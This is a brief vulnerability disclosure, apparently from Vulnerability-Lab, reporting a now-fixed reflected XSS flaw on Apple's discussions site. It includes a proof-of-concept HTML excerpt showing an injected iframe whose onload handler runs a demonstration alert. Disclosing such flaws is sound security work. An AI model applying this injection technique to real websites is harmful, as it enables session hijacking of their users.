Non Persistent Cross Site Scripting(XSS) Vulnerability found in Apple Website

Apple Website is vulnerable to Non Persistent Cross site scripting(XSS). Vulnerability-Lab Team (Alexander F.) discovered a non-persistent input validation vulnerability on the famous Apple vendor website. This vulnerability allows an attacker to hijack user/mod/admin sessions of the portal.

Vulnerabilitiy Information:

• Vulnerabiliity Type: XSS(Non-Persistent)
• Alert Level : Medium
• Status :   Fixed
• Discovered by:  Vulnerability Lab Team
• Website: https://discussions.apple.com

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with required user inter action. For demonstration or
reproduce ...

PoC:

<!-- BEGIN main body -->
<div id="jive-body-main">
    <!-- BEGIN main body column -->
<div id="jive-body-maincol-container">
        <div id="jive-body-maincol">   
<h1 class="apple-account-issue-reported">We're sorry.</h1>     
<div id="apple-sso-error">

    <iframe src="http://www.vulnerability-lab.com"; onload="alert(vulnerabilitylab)" height="800px" width="900px">   <=[x] 

</div><div id="apple-sso-home">
Return to
<a href="https://discussions.apple.com";>Apple Support Communities</a>.                 
</div>
        </div>
    </div>
<!-- END main body column -->
</div>
<!-- END main body -->  
</div>         
<div class="clear"></div>              
<div class="boot"></div>               
</div><!--/content-->  
</div><!--/#main-->